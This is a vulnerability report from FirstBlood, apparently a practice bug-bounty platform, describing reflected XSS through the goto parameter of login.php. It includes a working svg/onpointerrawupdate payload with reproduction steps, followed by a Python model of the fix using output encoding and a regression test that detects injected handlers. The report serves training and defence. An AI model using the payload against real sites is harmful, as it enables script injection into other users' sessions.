FirstBlood-#308 — Reflective XSS on login.php via goto parameter
This issue was discovered on FirstBlood v2
On 2021-10-25, panya Level 7 reported:
The goto parameter is still vulnerable to reflective XSS.
Steps to reproduce:
- Open https://579a3c7897af-panya.a.firstbloodhackers.com/login.php?goto=%22%3E%3Csvg/style=%22position:fixed;top:0;left:0;width:100%;height:100%;z-index:100%22/onpointerrawupdate=%22%0aconfirm%26lpar;origin%26rpar;%22%3E
- Move the mouse to any point of the site.
Actual result:
There will be an alert with the text "https://579a3c7897af-panya.a.firstbloodhackers.com"
Expected result:
The goto parameter value should be properly escaped or sanitized. The alert should not be shown.
Impact:
XSS on behalf of a user of this site.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: "><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"/onpointerrawupdate="%0aconfirm%26lpar;origin%26rpar;">
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.
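As an added illustration (not code from the FirstBlood application or from the reporter), the following Python models how the reflected goto value behaves in the hidden input before and after attribute-context output encoding. The form template and the two render functions are assumptions standing in for the markup login.php emits; in PHP the hardened version corresponds to passing the value through htmlspecialchars($goto, ENT_QUOTES, 'UTF-8'). The parser-based check at the end is the kind of regression test that would have flagged the legacy code path the developers missed, because it inspects the rendered page rather than trusting that a fix was applied everywhere.

```python
import html
from html.parser import HTMLParser

# URL-decoded form of the goto value quoted in the report (%22 -> ", %0a -> newline, %26 -> &).
REPORTED_GOTO = (
    '"><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"'
    '/onpointerrawupdate="\nconfirm&lpar;origin&rpar;">'
)

# Assumed template for the hidden field on login.php; the real markup is not on the page.
FORM_TEMPLATE = (
    '<form method="post" action="/login.php">'
    '<input type="hidden" name="goto" value="{goto}"></form>'
)


def render_login_legacy(goto: str) -> str:
    """The behaviour the report describes: the raw parameter is pasted into the attribute."""
    return FORM_TEMPLATE.format(goto=goto)


def render_login_fixed(goto: str) -> str:
    """Attribute-context output encoding: &, <, >, " and ' become entities, so the value
    can neither close the attribute nor open a new tag (PHP: htmlspecialchars + ENT_QUOTES)."""
    return FORM_TEMPLATE.format(goto=html.escape(goto, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, roughly as a browser tokenizer would."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []  # list of (tag name, {attribute: value})

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_tags(markup: str) -> list:
    """Tokenize rendered markup into (tag, attributes) pairs; entity references in
    attribute values are decoded, so a correctly encoded value round-trips unchanged."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def injected_handlers(markup: str) -> list:
    """Regression check: list every on* event-handler attribute in the rendered page.
    The template emits none, so a non-empty result means user input left its attribute."""
    return [
        f"{tag}@{attr}"
        for tag, attrs in parse_tags(markup)
        for attr in attrs
        if attr.lower().startswith("on")
    ]


if __name__ == "__main__":
    for name, render in (("legacy", render_login_legacy), ("fixed", render_login_fixed)):
        page = render(REPORTED_GOTO)
        print(name, [tag for tag, _ in parse_tags(page)], injected_handlers(page))
```

Running the block shows the legacy rendering tokenizing into form, input and a third svg tag carrying an onpointerrawupdate handler, while the fixed rendering yields only form and input, with the input's value attribute decoding back to the original string as inert data. Encoding is applied at the point of output in every code path that reflects the parameter, which is exactly what the earlier fix for ID 39 failed to do for this legacy endpoint.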